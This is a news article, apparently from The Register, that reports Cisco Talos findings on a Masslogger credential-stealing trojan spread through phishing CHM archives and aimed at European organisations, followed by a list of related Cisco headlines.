Security

Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos

Masslogger evolution rears its ugly head, $30 gets you three month license to cause carnage


Cisco Talos has uncovered a credential-stealing trojan that lifts your login details from the Chrome browser, Microsoft's Outlook and instant messengers.

Delivered through phishing emails, the Masslogger trojan’s latest variant is contained within a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla’s security research arm.

“CHM is a compiled HTML file that contains an embedded HTML file with JavaScript code to start the active infection process. Every stage of the infection is obfuscated to avoid detection using simple signatures,” it said.

Opening the “help” file deploys the malware onto the target system.

Cisco Talos added: “Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application.”

Apps vulnerable to these dastardly cred-stealing doings include Discord, Microsoft Outlook, Mozilla Thunderbird, Firefox and Chromium-based browsers. The malware also tries to exclude itself from Windows Defender scans.

The second stage of the infection is a PowerShell script, a common technique, that loads the main Masslogger loader from compromised legitimate hosts as a .jpg file. From there the loader is deployed and executed.

Talos said the malicious folk behind Masslogger were mostly targeting southern and eastern European countries: “Based on the combination of discovered emails and file names, we believe it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening in several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain.”

Masslogger is not an entirely new creation of the malware industry: Talos pointed to previous research by infosec chap Fred HK. He attributed it to a malware underground persona who goes by the handle of NYANxCAT. Prices for Masslogger were apparently $30 for three months or $50 for a lifetime licence.

Cisco’s analysis showed that Masslogger “is almost entirely executed and present only in memory” with just the email attachment and the HTML help file.

In-memory malware erupted in the early-to-mid 2000s. Its USP for malware criminals is that the malware is wiped from a target system on reboot. Recently the technique has been deployed against Linux and Apple operating systems. ®

Send us news
8 Comments

Ker-Splunk! Cisco closes $28 billion analytics acquisition

Job one: Splunkify Talos threat intelligence, then do the same all over the Cisco portfolio

Sun Microsystems co-founder charged with insider trading

Andreas Bechtolsheim is paying out less than $1M to SEC amid allegations he illegally bought options

Cisco is a fashion retailer now, with a spring collection to prove it

Promises quarterly lookbooks of branded tat, powered by branded kit

Nutanix doesn't expect a rush of VMware refugees – maybe for years

Beats guidance as renewals grow and waits for Broadcom and Cisco to bring more bucks

C-suite execs not immune to downsizing drama at Cisco

Maria Martinez, chief operating officer, is out after role was 'eliminated'

WTF is 'deployment phasing'? One reason Cisco revenue just went backwards, is what

Splunk deal may close early, but AI is a way off turning into a money fountain. Meanwhile, Cisco waits for you to finish projects

Cisco cuts 5% of workforce amid cautious enterprise spending

$800M charge facing network giant as customers work way through existing inventory

Cisco wields axe again as results season swings around

In an industry addicted to job cuts, 34,000 staff roles vanished in first six weeks of 2024

Cisco, Nvidia expand collab to push Ethernet into AI clusters

InfiniBand dominates in GPU-boosted servers while Big E gains steam

CDW settles in lawsuit with rival reseller over Cisco sales

Meanwhile pending case from Cisco accuses Dexon of selling counterfeit kit

Nearly 4-year-old Cisco vuln linked to recent Akira ransomware attacks

Evidence mounts of an exploit gatekept within Russia's borders

Cisco goes Christmas shopping, buys Cilium project originator Isovalent

Switchzilla likes what eBPF does for multicloud networking and security